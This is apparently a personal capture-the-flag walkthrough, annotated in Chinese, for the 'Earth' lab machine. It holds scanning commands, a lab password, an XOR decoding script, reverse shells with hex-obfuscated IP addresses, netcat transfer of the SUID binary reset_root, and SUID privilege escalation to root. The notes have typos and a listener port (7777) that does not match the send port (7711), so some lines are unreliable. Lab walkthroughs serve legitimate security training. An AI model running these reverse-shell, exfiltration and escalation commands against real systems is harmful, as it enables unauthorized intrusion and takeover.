192.168.113.129 靶机
192.168.113.128 卡里
sudo passwd root
su root
nmap 192.168.113.0/24
nmap -A 192.168.113.128
vim /etc/hosts
dirb https://earth.local
dirb https://terratest.earth.local
192.168.230.131/24 ip
192.168.230.134 靶机
earth.local terratest.earth.local
terra earthclimatechangebad4humans
bash -i >& /dev/tcp/0xC0.0xA8.0xE6.0x83/1234 0>&1 第一次反弹
nc -lvvp 1234
nc 192.168.43.118 1234 < /usr/bin/reset_root 第二次反弹
nc -nlvp 1234 >reset_root
find / -perm -u=s -type f 2>/dev/null
破译密码 用户名:terra earthclimatechangebad4humans
wget https://terratest.earth.local/testdata.txt --no-check-certificate 安装。。
vim xor.py 新建文件
import binascii
key1="2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
decode_txt = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
testdata = binascii.b2a_hex(decode_txt).decode()
print(hex(int(key1,16) ^ int(testdata,16)))
python xor.py 运行
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174L
https://www.toolscat.com/decode/hex 十六进制转换为字符
nc -nvlp 1111
bash -i >& /dev/tcp/0xC0A87180/1111 0>&1
find / -perm -u=s -type f 2>/dev/null 查看root特殊错误文件 都行 find / -perm -4000 2>/dev/null 查看三个文件
nc 0xC0A87180 7711 < /usr/bin/reset_root 监听kali
nc -lvvp 7777>reset_root 监听
apt-get install strace 下载
sudo ape-get install strace
chmod 777 reset_root 提权
strace ./reset_root 查看缺失文件
添加缺失文件:
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
/usr/bin/reset_root 拿到root密码
su rot
ls /root
cat root/root_flag.txt